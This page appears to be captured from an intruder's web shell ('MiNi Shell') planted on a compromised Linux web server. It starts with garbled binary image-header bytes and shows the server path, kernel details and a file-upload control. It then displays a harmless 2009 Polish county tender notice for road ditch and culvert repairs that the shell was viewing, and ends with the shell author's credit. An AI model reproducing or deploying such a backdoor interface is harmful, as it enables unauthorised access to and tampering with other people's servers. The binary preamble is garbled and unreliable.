JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090807/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090807/129401-N-2009.html

<p class="kh_header"><b>Oświęcim: Odnowa rowów, poboczy i przepustów przy drogach powiatowych na terenie powiatu oświęcimskiego</b><br>
<b>Numer ogłoszenia: 129401 - 2009; data zamieszczenia: 07.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Oświęcimiu , ul. Stanisławy Leszczyńskiej 12, 32-600 Oświęcim, woj. małopolskie, tel. 033 8430622, faks 033 8433593.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> nie dotyczy</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odnowa rowów, poboczy i przepustów przy drogach powiatowych na terenie powiatu oświęcimskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych przy realizacji zadania pn: Odnowa rowów, poboczy i przepustów przy drogach powiatowych na terenie powiatu oświęcimskiego ,   gdzie zakres zadania obejmuje m.in.:
a) W zakresie rowów i poboczy na długości 1000 mb:
    - roboty przygotowawcze, ścięcie poboczy i oczyszczenie rowów,
    - wywóz ziemi, dowóz frezu,
    - remont poboczy.
     b) W zakresie zjazdu na długości 10 mb:
          - roboty przygotowawcze, demontaż istniejącego zniszczonego zjazdu,
          - odtworzenie rurociągu pod zjazdem wraz ze ściankami czołowymi,
          - odtworzenie nawierzchni zjazdu.
    c) W zakresie przepustu o długości 5 m:
          - roboty przygotowawcze, demontaż istniejącego zniszczonego przepustu,
          - odtworzenie przepustu wraz ze ściankami czołowymi,
          - odtworzenie nawierzchni zjazdu,
          - roboty towarzyszące.
2. Szczegółowy opis przedmiotu zamówienia, zakres robót i sposób ich wykonania precyzuje przedmiar robót  i  Specyfikacje Techniczne Wykonania i Odbioru Robót - stanowiące  Załącznik Nr 9 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  O udzielenie zamówienia ubiegać się mogą Wykonawcy składający ważną i odpowiednią ofertę oraz:  
a)  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, a w szczególności: 
(1) wykażą, że wykonali w ciągu ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno zamówienie o wartości min. 100.000 zł  brutto w zakresie robót drogowych - ziemnych związanych z odnową poboczy i rowów,  z podaniem wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty  te zostały wykonane należycie,
(2)	dysponują  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia m.in.:  
      - kierownikiem budowy posiadającym  uprawnienia budowlane w specjalności   drogowej  wraz z aktualną przynależnością do właściwej Izby Samorządu Zawodowego na dzień składania ofert,
 (3) dysponują  lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia    jednostek  sprzętowych niezbędnych do wykonania zamówienia.   
  c)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. 
            -    posiadają  ubezpieczenie  od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej,
    d)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z  art. 24 ust. 1 i 2 PZP,
2.  Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty na zasadzie spełnia / nie spełnia.
3. Niespełnienie przez Wykonawcę chociażby jednego  warunku spowoduje wykluczenie Wykonawcy z postępowania.   Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.

4.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia ( pn. w  konsorcjum). W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego,  a jego pełnomocnictwo musi być podpisane przez uprawnionych przedstawicieli wszystkich pozostałych wykonawców. Przedmiotowe pełnomocnictwo musi zostać dołączone do oferty w oryginale lub odpisie potwierdzonym notarialnie.   Wykonawcy wspólnie ubiegający się o zamówienie, ponoszą solidarną odpowiedzialność za wykonanie umowy. 
5.	Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Wykonawca przed zawarciem umowy w sprawie zamówienia publicznego przedstawi  umowę regulującą współpracę wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia  spełnienia warunków udziału w postępowaniu  Wykonawca  składa następujące  dokumenty i oświadczenia:
1.	Formularz oferty  - wg   załącznika Nr 2 do SIWZ.
2.	Pełnomocnictwo dla pełnomocnika ustanowionego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. 
3.	Pełnomocnictwo do sporządzenia i podpisania oferty, jeżeli ofertę podpisuje osoba upoważniona przez osobę lub osoby uprawnione do reprezentowania firmy w sposób określony w akcie rejestrowym.
4.	Przedmiotowe pełnomocnictwa muszą zostać dołączone do oferty w oryginale lub odpisie potwierdzonym notarialnie.  
5.	W przypadku, gdy składający ofertę są wspólnikami spółki cywilnej do oferty należy dołączyć kserokopie umowy spółki.
6.	Oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w   art. 22 ust. 1 i art. 24 ust. 1 i 2   ustawy Prawo zamówień publicznych - wg  załącznika Nr 3 do SIWZ. 
7.	Zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust. 1 pkt. 2,3, ust. 2 pkt. 1,3,3a,5,5a,6, oraz ust. 3 pkt. 3  Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane. (Dz.U. Nr 87,  poz. 605z późn. zm.).
a)	Aktualnego  odpisu z  właściwego rejestru albo aktualnego  zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 m-cy  przed upływem terminu składania ofert. 
b)	Aktualne zaświadczenie  właściwego Naczelnika Urzędu Skarbowego  potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 m-ce przed upływem terminu składania ofert. 
c)	Aktualne zaświadczenie właściwego oddziału ZUS   lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca  nie zalega z opłatami składek  na ubezpieczenie społeczne i zdrowotne  lub uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 m-ce przed upływem terminu składania ofert. 
d)	Wykaz zrealizowanych zamówień wykonanych  w ciągu ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie   - wg załącznika Nr 4 do SIWZ.
e)	Wykaz osób, które będą uczestniczyć  w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia  wraz z dokumentami stwierdzającymi posiadane uprawnienia -  wg załącznika Nr 5 do SIWZ.  W przypadku korzystania przez Wykonawcę z  osób  od innego  podmiotu do wykazu należy dołączyć  pisemne zobowiązanie tych podmiotów do udostępnienia osób zdolnych  do wykonania zamówienia.
f)	Wykaz  narzędzi  i urządzeń (sprzętu technicznego), którymi dysponuje lub będzie dysponował  Wykonawca  wg załącznika Nr 6 do SIWZ.  W przypadku korzystania przez Wykonawcę z  sprzętu od innych podmiotów do wykazu należy dołączyć  pisemne zobowiązanie tych podmiotów do udostępnienia niezbędnych  narzędzi i urządzeń do wykonania zamówienia.
g)	Polisę lub inny dokument  ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie  prowadzonej działalności gospodarczej.
8.	Oświadczenie Wykonawcy, że zadanie będzie wykonane w całości siłami własnymi lub wykaz  zakresu robót przewidziany do powierzenia podwykonawcom - wg załącznika Nr 7 do SIWZ.
9.	Wzór umowy wg zał. Nr 8 do SIWZ  - zaakceptowany przez osobę lub osoby upoważnione do reprezentowania podmiotu  składającego ofertę.
10.	Kosztorys ofertowy szczegółowy wraz z nośnikami cen sporządzony na podstawie załączonego przedmiaru  robót podpisany  przez osobę lub osoby upoważnione do reprezentowania podmiotu  składającego ofertę.
11.	Zgodnie z art. 23 ust.1 PZP Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia. 
12.	W w/w przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy  w sprawie zamówienia publicznego, a jego pełnomocnictwo musi być podpisane przez uprawnionych przedstawicieli wszystkich pozostałych wykonawców. Przedmiotowe pełnomocnictwo musi zostać dołączone do oferty w oryginale lub odpisie potwierdzonym notarialnie.     
13.	W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, dokumenty wymienione w punkcie 7 a-c   winien dołączyć każdy podmiot występujący wspólnie.
14.	Jeżeli Wykonawca nie złoży wymaganych dokumentów i oświadczeń lub nie spełni jednego bądź więcej warunków, jego oferta zostanie odrzucona lub Wykonawca zostanie wykluczony z postępowania. Zgodnie z art. 24 ust. 4 ustawy ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
15.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, w miejsce dokumentów, o których mowa w pkt. 7 a,b,c  zobowiązany jest przedłożyć dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości, - wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert
b)	nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 m-ce przed upływem terminu składania ofert. 
16.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się powyższych dokumentów, Wykonawca może je zastąpić stosownym dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

17.	Dokumenty, o których mowa w pkt. 15 i 16 i  sporządzone w języku obcym Wykonawca składa wraz z tłumaczeniem na język polski; tłumaczenie musi być sporządzone  przez tłumacza przysięgłego.
18.	Dostarczane dokumenty ( za wyjątkiem pełnomocnictw oraz załączników od Nr 2 do 7 do SIWZ, które są składane tylko w oryginale)  mogą być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu w przypadku, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna  lub budzi wątpliwości co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat.oswiecim.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Oświęcimiu, ul. St. Leszczyńskiej 12, 32-600 Oświęcim,  -  pok. Nr 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2009 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Oświęcimiu, ul. St. Leszczyńskiej 12, 32-600 Oświęcim,  -  sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com